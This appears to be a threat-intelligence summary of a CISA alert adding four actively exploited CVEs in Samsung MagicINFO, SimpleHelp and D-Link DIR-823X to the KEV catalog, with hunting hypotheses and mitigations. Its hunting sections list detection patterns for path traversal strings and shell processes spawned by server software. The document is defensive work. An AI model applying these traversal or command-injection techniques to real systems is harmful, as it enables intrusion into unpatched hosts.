CISA Adds Four Known Exploited Vulnerabilities to Catalog

Key Takeaways

• CISA has added four new vulnerabilities to the Known Exploited Vulnerabilities (KEV) Catalog due to active exploitation in the wild.
• Affected products include Samsung MagicINFO 9 Server, SimpleHelp, and D-Link DIR-823X.
• The vulnerabilities involve Path Traversal, Missing Authorization, and Command Injection.
• Federal Civilian Executive Branch (FCEB) agencies are mandated to remediate these vulnerabilities under BOD 22-01.

Affected Systems

• Samsung MagicINFO 9 Server
• SimpleHelp
• D-Link DIR-823X

Vulnerabilities (CVEs)

• CVE-2024-7399
• CVE-2024-57726
• CVE-2024-57728
• CVE-2025-29635

Attack Chain

Malicious actors are actively exploiting public-facing applications using path traversal, missing authorization, and command injection vulnerabilities in Samsung MagicINFO 9 Server, SimpleHelp, and D-Link DIR-823X devices. Successful exploitation allows attackers to bypass authentication, access unauthorized files, or execute arbitrary commands on the target systems. Specific attack chains vary per vulnerability, but all are confirmed to be actively leveraged in the wild for initial access or privilege escalation.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

No specific detection rules or queries are provided in the CISA alert.

Detection Engineering Assessment

EDR Visibility: Low — Network appliances like D-Link routers typically cannot run EDR agents. While Samsung MagicINFO and SimpleHelp servers may have EDR, initial web-based exploitation might blend with normal web traffic unless post-exploitation commands are executed. Network Visibility: Medium — Network IDS/IPS and Web Application Firewalls (WAF) can potentially detect path traversal sequences (e.g., '../') or command injection payloads in inbound HTTP requests. Detection Difficulty: Moderate — Detecting exploitation requires specific network signatures for the CVEs or behavioral monitoring of the affected applications spawning unexpected child processes.

Required Log Sources

• Web Server Access Logs
• Network IDS/IPS Logs
• Application Audit Logs
• Process Creation Logs (Event ID 4688 / Sysmon Event ID 1)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for suspicious child processes (e.g., cmd.exe, sh, bash) spawned by SimpleHelp or Samsung MagicINFO server processes, indicating potential command injection or post-exploitation activity.	Process Creation Logs	Execution	Low
Search web access logs for URI patterns containing directory traversal sequences (e.g., '../', '..%2f') targeting Samsung MagicINFO or SimpleHelp endpoints.	Web Server Access Logs	Initial Access	Medium

Control Gaps

• Lack of EDR support on IoT and router devices (D-Link)
• Exposure of unpatched administrative interfaces to the public internet

Key Behavioral Indicators

• Unexpected child processes originating from web service executables
• Directory traversal strings in HTTP GET/POST requests

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Apply vendor-supplied patches for Samsung MagicINFO 9 Server, SimpleHelp, and D-Link DIR-823X immediately.
• Isolate vulnerable systems from the public internet if patching is not immediately possible.

Infrastructure Hardening

• Implement Web Application Firewalls (WAF) to block path traversal and command injection attempts.
• Restrict administrative interfaces to trusted IP ranges or internal networks only.

User Protection

• N/A

Security Awareness

• Ensure vulnerability management teams are subscribed to CISA KEV updates and prioritize patching accordingly.

MITRE ATT&CK Mapping

• T1190 - Exploit Public-Facing Application
• T1059.004 - Command and Scripting Interpreter: Unix Shell